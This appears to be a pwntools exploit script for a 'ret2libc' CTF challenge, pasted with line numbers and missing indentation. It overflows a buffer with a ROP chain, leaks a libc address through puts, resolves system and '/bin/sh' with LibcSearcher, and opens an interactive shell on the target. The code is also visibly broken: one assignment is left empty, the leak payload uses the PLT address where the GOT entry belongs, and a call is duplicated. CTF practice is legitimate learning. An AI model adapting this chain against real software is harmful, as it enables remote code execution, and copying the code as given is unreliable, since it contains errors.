1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
| from pwn import *
from LibcSearcher import*
from ctypes import*
elf=ELF(r"/home/wrwrw/vscode/pwn/moectf/ret2libc/pwn")
dll=
debug=True
if debug==True:
context(os='linux',arch='amd64',log_level='debug',terminal='bash')
p=process(r"/home/wrwrw/vscode/pwn/moectf/ret2libc/pwn")
# pwnlib.gdb.attach(p,'break main')
else:
p=remote("127.0.0.1" ,30671 )
if __name__=='__main__':
puts_got=elf.got['puts']
puts_plt=elf.plt['puts']
inputs=0x04011E8
pop_rdi_retn=0x000000000040117e#ROPgadget --binary babyof --only 'pop|ret' |grep rdi
p.sendlineafter('But..maybe libc can help u??\n',b'a'*0x58+p64(pop_rdi_retn)+p64(puts_plt)+p64(puts_plt)+p64(inputs))
p.recvline()
a=p.recvline(keepends=False)
puts=u64(a.ljust(8,b'\00'))
libc=LibcSearcher('puts',puts)
base=puts-libc.dump('puts')#此处是与泄露的got地址相减
system=base+libc.dump('system')
sh=base+libc.dump('str_bin_sh')
ret=0x000000000040101a #ROPgadget --binary pwn --only 'ret'
p.sendafter('But..maybe libc can help u??\n',b'a'*0x58+p64(ret)+p64(pop_rdi_retn)+p64(sh)+p64(system)+b'\n')
p.interactive()
p.interactive()
|
